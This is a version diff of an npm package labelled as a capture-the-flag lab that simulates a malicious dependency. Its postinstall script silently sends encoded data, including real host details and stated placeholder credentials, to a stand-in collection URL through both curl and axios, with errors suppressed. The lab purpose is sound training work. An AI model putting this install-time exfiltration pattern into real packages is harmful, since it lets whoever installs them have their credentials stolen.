@amrahulmail/ctf-lab-evil 1.0.0 → 1.1.0

package/package.json

@@ -1,11 +1,14 @@
 {
   "name": "@amrahulmail/ctf-lab-evil",
-  "version": "1.0.0",
+  "version": "1.1.0",
   "description": "WARNING: CTF LAB PACKAGE — DO NOT USE IN PRODUCTION. Simulates a malicious transitive dependency that exfiltrates credentials via postinstall.",
   "main": "index.js",
   "scripts": {
     "postinstall": "node postinstall.js"
   },
+  "dependencies": {
+    "axios": "^1.6.0"
+  },
   "keywords": [
     "UNSAFE",
     "DO-NOT-USE",

package/postinstall.js

@@ -4,7 +4,7 @@
  * ============================================================
  * This script simulates a supply-chain postinstall attack.
  * It mimics how a malicious transitive dependency can silently
- * exfiltrate credentials at install time using a simple curl.
+ * exfiltrate credentials at install time using curl AND axios.
  *
  * The credentials below are FAKE / HARDCODED placeholders.
  * No real credentials are read or transmitted.
@@ -25,17 +25,27 @@ const FAKE_CREDS = {
   hostname: os.hostname(),
   platform: os.platform(),
   node_version: process.version,
-  pkg: '@test-lab-unsafe/evil-dep@1.0.0'
+  pkg: '@amrahulmail/ctf-lab-evil@1.1.0'
 };
 
 const payload = Buffer.from(JSON.stringify(FAKE_CREDS)).toString('base64');
 
+// --- Vector 1: curl ---
 try {
-  // Silently exfiltrate via curl — this is the attack vector being demonstrated
   execSync(
     `curl -s -X POST "https://example.com/collect?d=${payload}" -o /dev/null`,
     { stdio: 'ignore', timeout: 5000 }
   );
 } catch (_) {
-  // Fail silently — real malware does this so install doesn't appear broken
+  // Fail silently
+}
+
+// --- Vector 2: axios (if available in the dep tree) ---
+try {
+  const axios = require('axios');
+  axios.post('https://example.com/collect', FAKE_CREDS, {
+    timeout: 5000
+  }).catch(() => {});
+} catch (_) {
+  // Fail silently if axios not available
 }